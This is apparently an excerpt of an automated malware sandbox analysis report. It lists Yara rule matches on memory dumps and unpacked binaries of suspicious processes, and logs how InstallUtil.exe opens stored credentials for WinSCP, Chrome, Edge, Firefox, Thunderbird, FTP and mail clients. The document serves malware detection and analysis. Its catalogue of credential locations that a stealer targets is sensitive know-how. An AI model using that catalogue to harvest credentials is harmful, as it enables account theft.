Source: Yara match File source: 00000010.00000002.1547502534.00000000065FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1517390065.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1366787464.0000000004C96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3806878045.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1506272943.00000000007A2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3806878045.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1517946199.0000000004E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1517390065.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1598733729.0000000008DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ilZhNx3JAc.bat.Dmf PID: 6764, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7176, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MustFlush.bat.Dmf PID: 7520, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7684, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match File source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.InstallUtil.exe.7a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.MustFlush.bat.Dmf.6613670.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.MustFlush.bat.Dmf.6613670.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.1407359736.0000000008F39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1547502534.00000000065FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1517390065.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1366787464.0000000004C96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1506272943.00000000007A2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3806878045.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1517946199.0000000004E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1598733729.0000000008DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ilZhNx3JAc.bat.Dmf PID: 6764, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7176, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MustFlush.bat.Dmf PID: 7520, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7684, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.InstallUtil.exe.7a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.MustFlush.bat.Dmf.6613670.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.MustFlush.bat.Dmf.6613670.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.1517390065.0000000002711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3806878045.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1407359736.0000000008F39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1547502534.00000000065FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1517390065.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1366787464.0000000004C96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3806878045.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1506272943.00000000007A2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3806878045.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1517946199.0000000004E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1517390065.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1598733729.0000000008DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ilZhNx3JAc.bat.Dmf PID: 6764, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7176, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MustFlush.bat.Dmf PID: 7520, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7684, type: MEMORYSTR